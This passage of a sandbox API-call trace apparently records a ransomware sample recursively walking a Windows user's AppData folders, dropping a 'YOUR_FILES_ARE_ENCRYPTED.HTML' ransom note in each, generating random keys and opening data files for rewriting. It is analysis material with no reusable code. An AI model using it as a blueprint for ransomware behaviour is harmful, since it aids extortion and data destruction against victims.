lpOverlapped=0x0) returned 1 [0119.820] CloseHandle (hObject=0x320) returned 1 [0119.821] GetProcessHeap () returned 0x600000 [0119.821] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.821] GetProcessHeap () returned 0x600000 [0119.821] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.821] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0d549b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0119.821] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.821] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState") returned 111 [0119.821] GetProcessHeap () returned 0x600000 [0119.821] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.821] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState" [0119.821] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\*" [0119.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0d549b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0119.822] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0d549b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.822] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0d549b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0119.822] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0119.822] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0119.822] GetProcessHeap () returned 0x600000 [0119.822] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.823] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.824] CloseHandle (hObject=0x320) returned 1 [0119.825] GetProcessHeap () returned 0x600000 [0119.825] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.825] GetProcessHeap () returned 0x600000 [0119.825] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.825] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e3e36ea, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e3e36ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e3e36ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0119.825] StrStrIW (lpFirst="Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.825] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned 181 [0119.825] GetProcessHeap () returned 0x600000 [0119.825] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.825] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" [0119.825] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*" [0119.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e3e36ea, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e3e36ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e3e36ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.825] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e3e36ea, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e3e36ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e3e36ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.825] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e3e36ea, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e409927, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e409927, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0119.826] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.826] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 197 [0119.826] GetProcessHeap () returned 0x600000 [0119.826] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.826] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0119.826] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0119.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e3e36ea, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e409927, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e409927, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315fab8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.826] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e3e36ea, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e409927, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e409927, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315fab8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.826] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e3e36ea, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x912ddf7a, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x5e455d80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x315fab8, dwReserved1=0x63d098, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0119.827] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.827] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 217 [0119.827] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.827] lstrlenW (lpString=".dat") returned 4 [0119.827] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.827] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\microsoft.windows.shellexperiencehost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0119.827] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5e409927, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e409927, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e409927, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc000, dwReserved0=0x315fab8, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0119.827] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.827] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 222 [0119.827] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.827] lstrlenW (lpString=".LOG1") returned 5 [0119.827] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.827] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5e409927, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e409927, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e409927, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315fab8, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0119.827] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.827] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 222 [0119.827] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.827] lstrlenW (lpString=".LOG2") returned 5 [0119.828] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.828] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5e409927, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e409927, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e409927, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315fab8, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0119.828] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.828] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 227 [0119.828] GetProcessHeap () returned 0x600000 [0119.828] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\microsoft.windows.shellexperiencehost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.833] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.834] CloseHandle (hObject=0x324) returned 1 [0119.834] GetProcessHeap () returned 0x600000 [0119.834] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.834] GetProcessHeap () returned 0x600000 [0119.835] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.835] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e3e36ea, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e409927, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e409927, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0119.835] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.835] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 211 [0119.835] GetProcessHeap () returned 0x600000 [0119.835] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\microsoft.windows.shellexperiencehost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.838] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.839] CloseHandle (hObject=0x320) returned 1 [0119.839] GetProcessHeap () returned 0x600000 [0119.839] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.839] GetProcessHeap () returned 0x600000 [0119.839] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.840] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0d549b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0119.840] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.840] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState") returned 113 [0119.840] GetProcessHeap () returned 0x600000 [0119.841] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.842] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState" [0119.842] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\*" [0119.842] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a0d549b, 